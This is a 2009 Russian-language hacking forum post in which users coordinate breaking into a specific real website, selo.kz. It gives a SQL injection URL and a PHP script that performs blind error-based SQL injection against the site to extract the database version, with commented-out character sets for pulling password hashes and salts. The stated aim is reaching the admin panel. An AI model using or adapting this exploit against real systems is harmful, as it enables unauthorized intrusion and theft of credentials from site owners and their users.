04.11.2009, 18:58
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от Gemini12
http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
сплоит, он конечно кривоват, но работать должен:
PHP код:
<?php
#$chars="abcdef0123456789"; // для хеша
#$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789"; // для соли
$chars=".54367890012-ntlog"; // бд
$i=1;
$to=10;
$c=0;
$cc=0;
$data="";
$ebana="";
set_time_limit(0);
while($i<=$to) {
while($c<=strlen($chars)) {
echo $i.":".$chars[$c];
$sock=fsockopen("www.selo.kz", 80, $errno, $errstr, 5);
if(!$sock) die("hehe fuckin connect");
$ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)";
$h="POST /fspisok.php? HTTP/1.0\r\n";
$h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$h.="Content-Type: application/x-www-form-urlencoded\r\n";
$h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n";
$h.="Host: www.selo.kz\r\n";
$h.="Content-Length: ".strlen($ept)."\r\n";
$h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n";
$h.=$ept;
fwrite($sock, $h);
sleep(1);
$c++;
$data="";
while(!feof($sock)) {
$data=fgets($sock, 1024);
if(eregi("Subquery returns more than 1 row", $data)) { $cc=1; break; }
}
if($cc==1) { echo ":OKE!!1\r\n"; $ebana.=$chars[$c-1]; break; }
else echo ":FUCK!1\r\n";
fclose($sock);
}
$c=0;
$cc=0;
$i++;
}
echo $ebana;
?>
|
|
|